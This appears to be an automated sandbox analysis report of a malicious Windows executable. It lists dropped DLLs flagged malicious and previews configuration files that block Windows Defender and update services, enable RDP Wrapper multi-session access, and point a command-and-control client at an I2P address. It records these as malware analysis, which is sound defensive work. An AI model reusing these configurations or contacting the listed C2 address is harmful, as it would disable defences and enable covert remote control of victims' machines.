                  Size (bytes):10669056
                  Entropy (8bit):7.443816651911507
                  Encrypted:false
                  SSDEEP:98304:RzfenAfcSl0KeEoTnZ4gBu8P1TAB3ruLIb9ly73Ji3vhqNDMmL98fjd3KiY9LeOm:gA/0F5PdyrlSQ5qNDMmYjd3RY9Lesc
                  MD5:2F829F1CB631D234C54F2E6C6F72EB57
                  SHA1:BD76CB633ED42E9E94580E1D995AF2E36D9E1A11
                  SHA-256:09B3B106A22BCB2DF3F09C7A1A082F2FE62927C337C183D3813D21513FB3FA43
                  SHA-512:71C0B077AA63B6DF3A1C2E0A1A0E179DA0466518F2BE6E10871642F03B3B8F63318258DA8C93B78E0CA45C753C3A6524751187FF3D5952D336BE3461651D0CD9
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................*......................@.............................@.......6....`... ................................................................d............0..............................`...(....................................................text...............................`..`.data....J.......L..................@....rdata...^...P...`...<..............@..@.pdata..d...........................@..@.xdata..............................@..@.bss....p...............................idata.............................@....CRT....`..........................@....tls......... .....................@....reloc.......0.....................@..B................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\wfpblk.ini

                  Download File
                  Process:C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exe
                  File Type:Generic INItialization configuration [svc]
                  Category:dropped
                  Size (bytes):195
                  Entropy (8bit):4.692426693515089
                  Encrypted:false
                  SSDEEP:3:PCLtupyhdA5A1XJy31ae0CYUAM9t2X0DwL1Uy/5ookVqEfokH2VmM74osLSgRUYp:PItZLJ4aZC9b/EhUyBjZBkWESqj
                  MD5:E025B58CB2D118FAFAE00850EE91C5F9
                  SHA1:DD23CE328F593AF74455F2C2F805B662466A1205
                  SHA-256:897FC59CEDFBCAFDB9D0BEFEE9FC21A1B4C61259992A40F1986921E406E36340
                  SHA-512:5CD3F72CB1FF5754F3329A1EF1C7D45826BE48540AAD60FC55B91C7EFDCBBEF8B6BEB66ED7E2CF338348CE3C43DE2C8B2C0E72C681A8C314ADBAE0F844C7B7EF
                  Malicious:false
                  Preview:[app]..MsMpEng.exe=1..MsSense.exe=1..SenseIR.exe=1..SenseNdr.exe=1..SenseCncProxy.exe=1..SenseSampleUploader.exe=1..[svc]..wuauserv=1..DoSvc=1..UsoSvc=1..WaaSMedicSvc=1..[ip4]..54.243.255.141=1..

                  C:\Users\user\AppData\Local\Temp\wfpblk.log

                  Download File
                  Process:C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):25052
                  Entropy (8bit):5.25163415683287
                  Encrypted:false
                  SSDEEP:768:abbEbNQ6s69WS8vv88o88888888888888j8888888888e88888880888888888AG:P
                  MD5:90246B5435654D62BDE97124534F677D
                  SHA1:471CFFF5ED6AC74296F5A3FCD2EA7E20E5CA5B1D
                  SHA-256:82AF4A3338419B0128EFCF8EF589FB3A88EAFF0530BEFADBE193539F9E133074
                  SHA-512:496E17E6BFC4FBAE60A054397751066B84176180DCDBC168D0E5B34ED1087A529CA60087F87CD2D06653EF337B160E80785A9D2A9A00730DF673264D2B6C0D09
                  Malicious:false
                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\user\AppData\Local\Temp\wfpblk.log)..[I] (debug_init) -> Done..[I] (fs_file_write) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini,mode=wb,buf_sz=195)..[I] (fs_file_read) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini,buf_sz=195)..[I] (ini_load) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini)..[D] (ini_get_sec) -> Done(name=app)..[D] (ini_get_sec) -> Done(name=app)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=[System Process],err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=System,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=Registry,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=smss.exe,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=csrss.exe,err=00000003)..[D] (ini_get_sec) ->

                  C:\Windows\Temp\3rVpJMV7

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):92672
                  Entropy (8bit):6.229119632298774
                  Encrypted:false
                  SSDEEP:1536:nZifIZPVsBXHCrwIxk8i/57CDDCZUohgfNGbDN:nZifcsVCrwI0CyZUocs
                  MD5:7FEA520E80E7A73252F2A5C204BBF820
                  SHA1:557D33F75805669A6D5E98D0E6CD3B790ECF3464
                  SHA-256:64B09FAC89FC9645DFE624D832BB2FF2FC8BA6BA9BC1A96C6EEE8C7F9C021266
                  SHA-512:6A8FE49BC671B2B1458C24E10509047B50150D3D565FC7FB45046A51C295E69189F35D53BA2F8727A44718F11E8A84EFDE019E5422E025767CF35FDA26F293F9
                  Malicious:true
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.....f......Y.........Io..........................................`... .........................................^....................`..................l............................J..(....................................................text...............................`..`.data...............................@....rdata...U.......V..................@..@.pdata.......`.......<..............@..@.xdata.......p.......F..............@..@.bss....`................................edata..^............P..............@..@.idata...............R..............@....CRT....X............d..............@....tls.................f..............@....reloc..l............h..............@..B........................................................................................................................................................................

                  C:\Windows\Temp\67HhspTz

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):75977
                  Entropy (8bit):7.8696816318811385
                  Encrypted:false
                  SSDEEP:1536:07klNoOPsg0evjAYqVwbLhhOW6xwz0U0paUgfVnsHk:EkPNPmevj5qabL9ydgNz
                  MD5:E53A179BB45CD7EDD8371740D65076BD
                  SHA1:6B74034746E12C2058614A9DF671C31B79EAA7E9
                  SHA-256:C33D095DBFFC43047A7930EB0811B11208D166FCFD612D8ED32556A6CE82B9DB
                  SHA-512:767105F8B88CD8C9E4E2BD9188C8174D5FD86D370D2E6A79B0E10EF4A79E994F24F8DB7A79C481B97F69DBEA8E311590E3B2D31E804EC5F572A3C37CF3EBC457
                  Malicious:false
                  Preview:I2Psu3................&.................1733281205......reseed@cnc.netPK........./.Y.o2*........;...routerInfo-eXkkiGm0Hskmt-0nixI7Fd2~NX5o5Laplk3k9Fh6Jr0=.dat..|f........59/}.w...............X.O..Q#.....M;`vv...oZ..;...U....gm..w._.y.......g.\....T..9<....v{...].K..Z..`....W..kX..7iu..bi..)..<.E.{.g..Q..v...RU....f.:~U-r.v.0.?I.c..S.W"U...P..9..*!..=+....oY..gY....m;t...n..mu.y...$q...,.?.._..v.n.z..m......Q....x....\..f.M.E31.[.xu._....K...:.1.i.i"..{c:>.YU.x...Gl.F.+......<..t..r....M....t....iy=....c0wWG.....-.lW.{.....w..\.g.2.0..1.......L..P....j.X..XPl..db.i..f`f....Y.o....T.P....._..d..f....h._..ik..ZQ``.ehnlldajd`..2.....C..`B.&.f.....:.n........)>.i...Q.I.a.f...N..ai.Ynn..f.I&. -..:.y.y^....N...N....~e!.^a...y.ai.n..i..`-F.:.UNf.e.&I..N...y...y.....>%n&en.......fU`..$..|dinjb`.$ B@.......X.Y.B..l9,,....L,...mu....s3....."...r<+.=...C.."...R.."LS..3.+...0..2.Y...../.9.......&`..-M.,.K\+...M2....}.#.........+s..".K.M`.20.@.3 .5/

                  C:\Windows\Temp\K7LxyvAX

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:Generic INItialization configuration [SLPolicy]
                  Category:dropped
                  Size (bytes):456534
                  Entropy (8bit):5.450314708570292
                  Encrypted:false
                  SSDEEP:1536:ElNN33L+MUIiG4IvREWddadl/Fy/kY5Psv:EX33L+MBdadl/Fy/kr
                  MD5:AC8B2EA4A310D6748A8845C235A3CDC8
                  SHA1:0B489969C7D95411E4104B9BB952C0024EDE1616
                  SHA-256:77BA4F6F25BA1050847C22B7AAF1E662650A99A15222466091FB056F436048E3
                  SHA-512:0E807AF4D4E0D2F71FB8BE93DFCBCE62F3077E7C94B993529A0012088304A1B34BEDF8915EA23A83611FAB66495B1F8359225DBF95ED3F37C16607257217F191
                  Malicious:false
                  Preview:; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-11-24..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS

                  C:\Windows\Temp\L0FsI2PI

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):91136
                  Entropy (8bit):6.2041507656664825
                  Encrypted:false
                  SSDEEP:1536:SgYI/+tvE0A2HTsPtbNqnXi2h+t3w8S31+g5KvSxY:SgYIl2HIPtbNkrhPl+4K6e
                  MD5:CB4F460CF2921FCD35AC53F4154FCBE0
                  SHA1:AFD91433EF0C03315739FB754B16D6C49D2E51F2
                  SHA-256:D6B5B5303D7079CF31EA9704E7711A127CFE936EA108CDFFF938C7811C6EDA31
                  SHA-512:BEE872D6B1226409C472636255AE220BA8E0950C0D65DD0D8B9F3E90D43B65FFE2133B33648452C34A3F1BCA958F10BAF3FADBA5BF4228057928F4EEAC7AB600
                  Malicious:true
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.....`......Y.....................................................`... ..............................................................`..................d............................I..(......................h............................text...X...........................`..`.data...............................@....rdata.. T.......V..................@..@.pdata.......`.......8..............@..@.xdata..4....p.......B..............@..@.bss....@................................edata...............L..............@..@.idata...............N..............@....CRT....X............^..............@....tls.................`..............@....reloc..d............b..............@..B........................................................................................................................................................................

                  C:\Windows\Temp\PrnaubOU

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):4
                  Entropy (8bit):2.0
                  Encrypted:false
                  SSDEEP:3:9:9
                  MD5:006F29D8E822B9241020AEC2495EF819
                  SHA1:6510BEB08A14B6BCC74D32031C1B19AA07169CF1
                  SHA-256:69FF245F90727BBEFA5B1F82E2429FF74F31A6A5385B5129A2FE3378DCF200F1
                  SHA-512:16916BC4477F6FC1AE1132D2F5D2B9587650DC44E23DE15E0FE787AFE23175E0E236C020C753BA5158F688BEACDA523AAFB7EC1DF82B6F7619573C90A48742E8
                  Malicious:false
                  Preview:wgNj

                  C:\Windows\Temp\eH39owOK

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):8568
                  Entropy (8bit):4.958673415285098
                  Encrypted:false
                  SSDEEP:96:e+I8WTr7LjdL33ZqPDNLWBsaBMG+xv9G86UJ5TMmyvmyLKkfUZleZnE/Ndm/7CIg:e+I8Mr7VtXl1zrrIqEVdm/7CItWR0SX
                  MD5:27535CEE6740DFC50A78A0322415E67C
                  SHA1:E80541CF15C8ED4C5EEDA8D8C24674A5B8A27F61
                  SHA-256:FB0CDBF4E0215AE1866E97860C2AC3DD96E7498BFE2AF3D82378041CDFF7F292
                  SHA-512:25F11A8262B5A2F59BD6C9D8673B5AD5A140EAE8C007244810B2924EB08B5CF54AE19E61BE5139319877278D11868BBD85BD2E6C67F5FAD4E2A458E2844EBC0C
                  Malicious:false
                  Preview:## Configuration file for a typical i2pd user.## See https://i2pd.readthedocs.io/en/latest/user-guide/configuration/.## for more options you can use in this file...## Lines that begin with "## " try to explain what's going on. Lines.## that begin with just "#" are disabled commands: you can enable them.## by removing the "#" symbol...## Tunnels config file.## Default: ~/.i2pd/tunnels.conf or /var/lib/i2pd/tunnels.conf.# tunconf = /var/lib/i2pd/tunnels.conf..## Tunnels config files path.## Use that path to store separated tunnels in different config files..## Default: ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnels.d.# tunnelsdir = /var/lib/i2pd/tunnels.d..## Path to certificates used for verifying .su3, families.## Default: ~/.i2pd/certificates or /var/lib/i2pd/certificates.# certsdir = /var/lib/i2pd/certificates..## Where to write pidfile (default: /run/i2pd.pid, not used in Windows).# pidfile = /run/i2pd.pid..## Logging configuration section.## By default logs go to stdout with level 'inf

                  C:\Windows\Temp\erT926ze

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):37376
                  Entropy (8bit):5.7181012847214445
                  Encrypted:false
                  SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
                  MD5:E3E4492E2C871F65B5CEA8F1A14164E2
                  SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
                  SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
                  SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................

                  C:\Windows\Temp\fYg6Jeg5

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):105984
                  Entropy (8bit):6.285421743969757
                  Encrypted:false
                  SSDEEP:1536:BQrD6CCk73WUJ/2WEvooF8VohjBdmaKqYdpFXaRQSCYA8CSs8qgu06wCYA8CSs8V:BA6sDl/2WEvo0DipFXaRQO
                  MD5:6E01ED70D02CE47F4D27762A9E949DEE
                  SHA1:32B9199EBBD7891CF0091B96BF3B2C9303AB7B7A
                  SHA-256:EFB9B3D4356071EE8FE66979140E7435371EC668088A68786C6FDCEDF29D7376
                  SHA-512:B21C8F79553EE513F6C48EFA618C20FB82CBC77EDE95579C28C21D8BB433B93D108CEF442B48ECBDABD0B06AA5C8AEDC8B26316167D1793A0E972B38D4210854
                  Malicious:true
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........................................@............`... .........................................^.......................T............0..h...............................(.......................`............................text...............................`..`.data........ ......................@....rdata..Pc...0...d..................@..@.pdata..T............n..............@..@.xdata...............x..............@..@.bss.... ................................edata..^...........................@..@.idata..............................@....CRT....X...........................@....tls......... ......................@....reloc..h....0......................@..B........................................................................................................................................................................

                  C:\Windows\Temp\gBXHuZY0

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):9146880
                  Entropy (8bit):6.674868432808522
                  Encrypted:false
                  SSDEEP:196608:DiRu5DnWLX6Cs3E1CPwDvt3uF8c339CME:DiRsCKCsU1CPwDvt3uFd9CME
                  MD5:676064A5CC4729E609539F9C9BD9D427
                  SHA1:F77BA3D5B6610B345BFD4388956C853B99C9EB60
                  SHA-256:77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
                  SHA-512:4C876E9C1474E321C94EA81058B503D695F2B5C9DCA9182C515F1AE6DE065099832FD0337D011476C553958808C7D6F748566734DEEE6AF1E74B45A690181D02
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........."...).t]......R..0........................................P............`... .......................................z..t... ...,............p..?...........p...............................`m.(....................*...............................text...(r]......t].................`..`.data.........]......x].............@....rdata..`>...@^..@....^.............@..@.pdata...?....p..@...^p.............@..@.xdata...t....t..v....t.............@..@.bss....`Q...@z..........................edata...t....z..v....z.............@..@.idata...,... ......................@....CRT....`....P......................@....tls.........`......................@....reloc.......p......................@..B........................................................................................................................................................................

                  C:\Windows\Temp\p2IxdCTt

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:Generic INItialization configuration [cnccli]
                  Category:dropped
                  Size (bytes):213
                  Entropy (8bit):5.129024990254676
                  Encrypted:false
                  SSDEEP:6:1EVQLD4oWuJO+70XZ6DIzOD7kXpTRL9gWVUDeLn:Cjo5JO+70XZmeC7kX9vgpKL
                  MD5:7D88563AD41BAF4026CFC5D098CBF40D
                  SHA1:442756834CCCEB84F219F3C762852437FBB3458E
                  SHA-256:D80EDD4C9FCF10348AAAB4D5F9D796AD827271827463D71FE32F2F896D0841D3
                  SHA-512:F58A28FCAC43359D217C5B238C00BE73FBA791BEC7B987AA647F6FF02A7514D4C4B7449968DF9237D3B4D5BBF05DBEA82C8B41C956B2F0566FAE8C54056010DF
                  Malicious:false
                  Preview:[main]..version=400004957b19a09d..[cnccli]..server_host=9ad81489..server_port=41674..server_timeo=15000..i2p_try_num=5..i2p_sam3_timeo=15000..i2p_addr=2lyi6mgj6tn4eexl6gwnujwfycmq7dcus2x42petanvpwpjlqrhq.b32.i2p..

                  C:\Windows\Temp\rVtDGbMQ

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):115712
                  Entropy (8bit):6.193969228624904
                  Encrypted:false
                  SSDEEP:1536:55YoK6WOBqFp//wVUE/+TGAf5EkgE1duJmwTxOd/lZ1pgX7:55YoSb/Iv/+TNf5Ee1YLTxOd9Z16X7
                  MD5:EC9499EE84ED09B77BE0A35EC87B781C
                  SHA1:4148D40284BAB415DDB828BD4061A4FE93C9AF26
                  SHA-256:5E38EA7E3DD96FE1C6BB2EBA38C7BDE638C6B6E7898F906E343D9500AFF86499
                  SHA-512:D65933B825419719021D0D2F43B45616A5B1238550BFDC72D2F4F148E284E9FE488417021A45B6D2F61770E31150B3331B1071AFE7EBB85AF6B379D040A9BEBC
                  Malicious:true
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........."h.............................P......JA....`... .........................................^....................................@..l...............................(.......................h............................text...x...........................`..`.data........0....... ..............@....rdata.. d...@...f...*..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B........................................................................................................................................................................

                  C:\Windows\Temp\rmcjgYnL

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):115712
                  Entropy (8bit):6.25860377459178
                  Encrypted:false
                  SSDEEP:1536:+8zEo3EM0MBfGCqx22eMO4HROUeS2qjVO+n98TLmifu:LzEms12D4xOU31n98TLmh
                  MD5:BD1D98C35FE2CB3E14A655AEDE9D4B01
                  SHA1:49361C09F5A75A4E2D6E85FBDA337FC521770793
                  SHA-256:961C65CFDF0187A945AD6099EFD9AF68D46D36EC309A2243F095EF739EE9AC7E
                  SHA-512:74BFD70A08E2CB86AF10B83D0CFD723A24613C9E6E2018CDC63BD425D45845C1214BF68115E04F95572684F27A0CF52D271E2419F8056E0A0467B88507D132D4
                  Malicious:true
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........................................P.......p....`... .........................................^....................................@..p...............................(...................X................................text...8...........................`..`.data........0......."..............@....rdata..pi...@...j...$..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..p....@......................@..B........................................................................................................................................................................

                  C:\Windows\Temp\y8J74cEH

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):129536
                  Entropy (8bit):6.2852879161990645
                  Encrypted:false
                  SSDEEP:1536:UmeFYyUJdEqzx2LVJ4ngXsNXGRqnbxeGqS/h0E0P3j4NBtRLBhBr:UZUJdhxCJ4ngg46weh0dr4vnV
                  MD5:88E6178B0CD434C8D14710355E78E691
                  SHA1:F541979CAD7EE7C6D8F2B87A0F240592A5DC1B82
                  SHA-256:7B40349481AD6C522A23FB3D12D6058EC0A7C5B387348FB4AE85135EE19C91A4
                  SHA-512:C4330A9EE1E69785420AABCFD1991AAAEB0F1764EB7E857F0C86161F61E1FFD467B458A2D458D3C55BB76D00F26FAC481D026443AB0796D0AEF38BF06CD84B8F
                  Malicious:true
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.<..........Y.........,...................................../*....`... ...................................... ..^....0..D............................p..l...............................(...................p5...............................text....:.......<..................`..`.data........P.......@..............@....rdata.......`.......B..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^.... ......................@..@.idata..D....0......................@....CRT....X....P......................@....tls.........`......................@....reloc..l....p......................@..B........................................................................................................................................................................

                  C:\Windows\Temp\ypqwg32t

                  Download File
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):6.236071662185895
                  Encrypted:false
                  SSDEEP:1536:v6YjTy83xoAWVbgh4xf4j0+Fwpj7bx8eSlsfe1tgvEK335:v6Yjqj1gh4xf4w+G7Cge1tgb335
                  MD5:CE579A1BDCB9763DAFEBF01AD29F918C
                  SHA1:F3E317C09E27DD0DA11AEE1578B7034BA1AC15DD
                  SHA-256:0B628EA2BA9CD77621D90A0A7456659ED86C118EB7655F6074B3B5648BAC0A02
                  SHA-512:EB688ED1A4AC5C3B975C2B005BE4BFD04D7CC762AF18DED190D0F903D39BDB301EADB800866BA72F6B8C36B7ABFB5765E0EB5081158C67BC33F056BD41280BC3
                  Malicious:true
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y.........?..............................0......Uu....`... .........................................^.......................$............ ..l........................... v..(.......................`............................text...............................`..`.data...............................@....rdata...a... ...b..................@..@.pdata..$............h..............@..@.xdata..T............r..............@..@.bss.... ................................edata..^............|..............@..@.idata...............~..............@....CRT....X...........................@....tls................................@....reloc..l.... ......................@..B........................................................................................................................................................................

                  Static File Info

                  General

                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                  Entropy (8bit):6.136682788930128
                  TrID:
                  • Win64 Executable GUI (202006/5) 92.64%
                  • Win64 Executable (generic) (12005/4) 5.51%
                  • Generic Win/DOS Executable (2004/3) 0.92%
                  • DOS Executable Generic (2002/1) 0.92%
                  • VXD Driver (31/22) 0.01%
                  File name:ET5.exe
                  File size:17'157'120 bytes
                  MD5:98c7ec9eb9c760e176a78a01bcb9f91c
                  SHA1:f88a8f1c1be4d07dafb27c65d36217eea4125020
                  SHA256:e779e7c5dfba028f616eb4efc98523561e194c0cbb99192a9dab535f9d7936a4
                  SHA512:cfe01247d0c9317e2ad6a0813b440fe096314cc17a53c736054d64ab2df00596ff8a927c2b3e43953ff023ad9ba32b6cd7c69de09dea2b62ace488b35ab89694
                  SSDEEP:98304:H1ZlHoeoVRfsVhKgr4oC+64469EGG1vGP8PHHsfNOIGdQI:V7oeoTfsVoy4oC+6MEGC88Cp
                  TLSH:6E074BBB77A59168C16DC13BC0638F00E93370B94B37C2E757A9066C9E629C45E3EB25
                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7.......................................................................................................................................

                  File Icon

                  Icon Hash:6ab06e9aaaba8e50

                  Static PE Info

                  General

                  Entrypoint:0x1033840
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                  DLL Characteristics:
                  Time Stamp:0x6751C478 [Thu Dec 5 15:19:20 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:2
                  File Version Major:5
                  File Version Minor:2
                  Subsystem Version Major:5
                  Subsystem Version Minor:2
                  Import Hash:4f8fac411df99d6d54fbaf68fa03582e

                  Entrypoint Preview

                  Instruction
                  push ebp
                  dec eax
                  sub esp, 20h
                  dec eax
                  mov ebp, esp
                  nop
                  dec eax
                  lea ecx, dword ptr [FFFE53D8h]
                  call 00007FDBFF8DFD70h
                  dec eax
                  mov eax, dword ptr [000F5894h]
                  dec eax
                  mov ecx, dword ptr [eax]
                  call 00007FDBFFC12FC1h
                  dec eax
                  mov eax, dword ptr [000F5885h]
                  dec eax
                  mov ecx, dword ptr [eax]
                  mov dl, 01h
                  call 00007FDBFFC15C70h
                  dec eax
                  mov eax, dword ptr [000F5874h]
                  dec eax
                  mov ecx, dword ptr [eax]
                  dec eax
                  mov edx, dword ptr [FFFE4D32h]
                  dec esp
                  mov eax, dword ptr [000F617Bh]
                  call 00007FDBFFC12FC3h
                  dec eax
                  mov eax, dword ptr [000F5857h]
                  dec eax
                  mov ecx, dword ptr [eax]
                  call 00007FDBFFC131D4h
                  call 00007FDBFF8D735Fh
                  jmp 00007FDC004FAD5Ah
                  nop
                  nop
                  call 00007FDBFF8D7556h
                  nop
                  dec eax
                  lea esp, dword ptr [ebp+20h]
                  pop ebp
                  ret
                  dec eax
                  nop
                  dec eax
                  lea eax, dword ptr [00000000h+eax]
                  dec eax
                  sub esp, 28h
                  call 00007FDBFF8D6AECh
                  dec eax
                  add esp, 28h
                  ret
                  int3
                  int3
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0xd5b0000x9a.edata
                  IMAGE_DIRECTORY_ENTRY_IMPORT0xd4b0000x5c50.idata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xe980000x1eb200.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0xe000000x97e9c.pdata
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xd5e0000xa1634.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0xd5d0000x28.rdata
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
